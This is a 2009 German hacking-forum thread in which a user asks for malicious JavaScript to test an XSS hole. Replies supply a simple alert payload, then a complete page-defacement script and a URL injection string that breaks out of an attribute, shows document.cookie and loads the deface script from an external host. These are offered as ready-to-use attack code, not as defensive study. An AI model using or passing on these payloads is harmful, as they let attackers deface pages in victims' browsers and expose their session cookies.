Schadhaftes Javascript

**Brainfuck ++** · 16.07.2009, 08:37

Hey Leute,

ich brauche einen kleinen JS Virus zum Testen von einem XSS.
Wer hätte da eins ?

Lieben Gruß

**-=Player=-** · 17.07.2009, 12:51

die frage ist jetzt nur, was du unter "schadhaft" oder "virus" verstehst.
die meisten javascript schadcodes sind oft nur würmer, die sich auf der oder anderen homepages verbreiten. (die werden aber meistens speziell für einen angeriff geschrieben)
also solltest du schon etwas genauer beschreiben was du willst.

p.s. um eine xss zu testen brauch man kein Virus
<script>alert(1337)</script>
reicht auch aus

**kalachnikov** · 17.07.2009, 12:56

Was soll denn dein JS Virus anrichten?
Bitte um detailiertes Anliegen.

**Brainfuck ++** · 19.07.2009, 11:23

das mit dem alert hab ich schon gemacht ... ;-) das funktioniert ...

genauere angaben kann ich leider nicht geben, weil ich nicht weiss wie sehr ich mit js irgendwas am browser usw. manipulieren kann...was ist denn möglich ?

**kalachnikov** · 19.07.2009, 11:58

du kannst mittels javascript eine page defacen, wenn du das meinst..
hier das Javascript:

Code:

var title = "XSSED BY kalachnikov";var bgcolor = "#000000";var image_url = "suchs dir aus!";var text = "XSS By kalachnikov";var font_color = "#00FF00";deface(title, bgcolor, image_url, text, font_color); function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {  document.title = pageTitle;  document.body.innerHTML = '';  document.bgColor = bgColor;  var overLay = document.createElement("div");  overLay.style.textAlign = 'center';  document.body.appendChild(overLay);  var txt = document.createElement("p");  txt.style.font = 'normal normal bold 30px Verdana';  txt.style.color = fontColor;  txt.innerHTML = pageText;  overLay.appendChild(txt);   if (image_url != "") {    var newImg = document.createElement("img");var centerImg = document.createElement("center");    newImg.setAttribute("border", '0');    newImg.setAttribute("src", imageUrl); centerImg.appendChild(newImg);   overLay.appendChild(centerImg);  }  var footer = document.createElement("p");  footer.style.font ='italic normal normal 12px Arial';  footer.style.color = '#333333'; footer.innerHTML = title;  overLay.appendChild(footer);}

und das fügst du in die Url ein:

Code:

">/kalachnikov/><script>alert(document.cookie)</script><script src=http://deinePage.de/style.js></script>

damit kannst du eine page "manipulieren" jedoch nicht schädigen..

**-=Player=-** · 26.07.2009, 14:25

das mit dem deface ist nicht ganz richtig, der deface erscheint nur clientseitig und nicht server seitig.

**kalachnikov** · 26.07.2009, 19:58

ja, hast natürlich recht! habs vergessen zu erwähnen...

Thema: Schadhaftes Javascript

Themen-Optionen

Anzeige

Schadhaftes Javascript

Stichworte

Berechtigungen